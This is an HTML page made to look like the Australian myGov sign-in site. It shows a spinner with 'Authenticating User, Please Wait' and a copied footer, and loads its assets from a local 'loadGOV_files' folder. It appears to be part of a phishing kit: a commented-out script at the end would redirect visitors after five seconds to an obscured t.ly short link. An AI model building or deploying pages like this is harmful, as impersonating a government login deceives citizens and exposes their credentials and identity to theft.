<!DOCTYPE html>
<html lang="en"><head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <title>
    Sign in
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="http://localhost:3003/img/favicon.png" type="image/png">
	<link href="loadGOV_files/css.css" rel="stylesheet">
  <link rel="stylesheet" href="loadGOV_files/main.css">
  <link rel="javascript" href="loadGOV_files/hotreload.js">
  <style>
    
#html-spinner, #svg-spinner{
  -webkit-transition-property: -webkit-transform;
  -webkit-transition-duration: 1.2s;
  -webkit-animation-name: rotate;
  -webkit-animation-iteration-count: infinite;
  -webkit-animation-timing-function: linear;
  
  -moz-transition-property: -moz-transform;
  -moz-animation-name: rotate; 
  -moz-animation-duration: 1.2s; 
  -moz-animation-iteration-count: infinite;
  -moz-animation-timing-function: linear;
  
  transition-property: transform;
  animation-name: rotate; 
  animation-duration: 1.2s; 
  animation-iteration-count: infinite;
  animation-timing-function: linear;
}

@-webkit-keyframes rotate {
    from {-webkit-transform: rotate(0deg);}
    to {-webkit-transform: rotate(360deg);}
}

@-moz-keyframes rotate {
    from {-moz-transform: rotate(0deg);}
    to {-moz-transform: rotate(360deg);}
}

@keyframes rotate {
    from {transform: rotate(0deg);}
    to {transform: rotate(360deg);}
}

</style>


</head>

<body>
  <header role="banner" class="header">
    <section class="wrapper">
      <div class="inner">
        <div class="cbLogin-grid">
          <div class="cbLogin-grid-row">
            <a href="https://beta.my.gov.au/" class="cbLogin-logo__link">
              <img id="cbLogin-logo" src="loadGOV_files/logo-dark.svg" role="img">
            </a>

            <div class="header-links">
              <a href="https://beta.my.gov.au/en/about/help">Help</a>
            </div>
          </div>
        </div>
      </div>
    </section>
  </header>

  <div class="wrapper-mapwap">
    <div class="main-block" role="main">
      <div style="margin-top: 50px;margin-bottom:150px;text-align:center;">
        <svg id="svg-spinner" xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48">
          <circle cx="24" cy="4" r="4" fill="#fff"/>
          <circle cx="12.19" cy="7.86" r="3.7" fill="#000bf2"/>
          <circle cx="5.02" cy="17.68" r="3.4" fill="#fef7e4"/>
          <circle cx="5.02" cy="30.32" r="3.1" fill="#000bf2"/>
          <circle cx="12.19" cy="40.14" r="2.8" fill="#feefc9"/>
          <circle cx="24" cy="44" r="2.5" fill="#000bf2"/>
          <circle cx="35.81" cy="40.14" r="2.2" fill="#fde7af"/>
          <circle cx="42.98" cy="30.32" r="1.9" fill="#000bf2"/>
          <circle cx="42.98" cy="17.68" r="1.6" fill="#fddf94"/>
          <circle cx="35.81" cy="7.86" r="1.3" fill="#000bf2"/>
        </svg>
        <h3> Authenticating User</h3>
        <p>Please Wait.............</p>

      </div>
    </div>
  </div>

  <footer role="contentinfo">
    <div class="wrapper">
      <div class="inner">
        <section class="footer-list">
          <nav>
            <h2 class="sr-only">Footer</h2>
            <ul class="lower-links">
              <li>
                <a href="https://my.gov.au/en/about/terms">Terms of use</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/privacy-and-security">Privacy and security</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/copyright">Copyright</a>
              </li>
              <li>
                <a href="https://my.gov.au/en/about/accessibility">Accessibility</a>
              </li>
            </ul>
          </nav>
        </section>

        <div class="footer-lower">
          <section class="footer-lower-logo">
            <a href="https://beta.my.gov.au/">
              <img src="loadGOV_files/logo-light.svg" width="313.17" height="70" role="img">
            </a>
            <div class="spin"></div>
          </section>

          <p class="footer-acknowledgement">We acknowledge the 
Traditional Custodians of the lands we live on. We pay our respects to 
all Elders, past and present, of all Aboriginal and Torres Strait 
Islander nations.</p>
<div class="loader"></div>

        </div>
      </div>
    </div>
  </footer>

//  <script>
//    setTimeout(() => {
//      window.location.href = 'https://t.ly/Er0uv';
//    }, 5000)
//  </script>



</body></html>